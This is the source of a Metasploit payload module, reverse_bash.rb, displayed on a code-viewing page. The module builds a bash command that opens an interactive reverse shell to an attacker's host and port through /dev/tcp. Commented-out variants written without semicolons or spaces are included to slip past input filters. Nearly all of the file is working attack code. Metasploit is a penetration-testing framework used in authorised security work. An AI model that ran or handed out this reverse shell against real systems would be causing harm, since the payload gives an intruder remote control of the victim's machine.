Path: blob/master/modules/payloads/singles/cmd/unix/reverse_bash.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = :dynamic78include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Unix Command Shell, Reverse TCP (/dev/tcp)',16'Description' => %q{17Creates an interactive shell via bash's builtin /dev/tcp.1819This will not work on circa 2009 and older Debian-based Linux20distributions (including Ubuntu) because they compile bash21without the /dev/tcp feature.22},23'Author' => 'hdm',24'License' => MSF_LICENSE,25'Platform' => 'unix',26'Arch' => ARCH_CMD,27'Handler' => Msf::Handler::ReverseTcp,28'Session' => Msf::Sessions::CommandShellUnix,29'PayloadType' => 'cmd_bash',30'RequiredCmd' => 'bash-tcp',31'Payload' => {32'Offsets' => {},33'Payload' => ''34}35)36)37register_advanced_options(38[39OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash']),40OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])41]42)43end4445#46# Constructs the payload47#48def generate(_opts = {})49vprint_good(command_string)50return super + command_string51end5253#54# Returns the command string to use for execution55#56def command_string57fd = rand(20..219)58return "#{datastore['BashPath']} -c '0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};#{datastore['ShellPath']} <&#{fd} >&#{fd} 2>&#{fd}'"59# same thing, no semicolons60# return "/bin/bash #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"61# same thing, no spaces62# return "s=${IFS:0:1};eval$s\"bash${s}#{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']}$s<&#{fd}$s>&#{fd}&\""63end64end656667